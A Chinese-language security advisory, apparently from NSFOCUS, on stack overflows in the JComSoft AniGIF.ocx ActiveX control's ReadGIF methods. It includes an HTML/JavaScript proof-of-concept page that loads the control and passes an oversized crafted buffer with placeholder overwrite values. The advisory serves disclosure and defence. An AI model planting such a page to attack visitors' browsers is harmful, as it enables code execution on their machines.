安全研究

安全漏洞
JComSoft AniGIF.ocx ActiveX控件多个栈溢出漏洞

发布日期:2008-08-10
更新日期:2008-08-12

受影响系统:
JComSoft Animation GIF ActiveX 2.4.7
JComSoft Animation GIF ActiveX 1.12b
JComSoft Animation GIF ActiveX 1.12a
描述:
BUGTRAQ  ID: 30621

Animation GIF ActiveX控件(anigif.ocx)用于在OLE容器中显示GIF文件。

anigif.ocx控件没有正确地验证对ReadGIF和ReadGIF2方式所传送的输入参数,如果用户受骗访问了恶意网页并向上述方式传送了超长参数的话,就可以触发栈溢出,导致执行任意指令。

<*来源:Guido Landi
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html>
<body>
<object classid='clsid:82351441-9094-11D1-A24B-00A0C932C7DF' id='target' />
</object>
<script language=javascript>

var buf;
for (var i=0; i<259; i++) buf += "X";

buf +="BBBB";
buf += "CCCC";

for (var i=0; i<5728; i++) buf += "H";

target.ReadGIF(buf);

window.location = "http://www.google.com";

</script>
</body>
</html>

建议:
厂商补丁:

JComSoft
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.jcomsoft.com/anigif.htm

浏览次数:2650
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客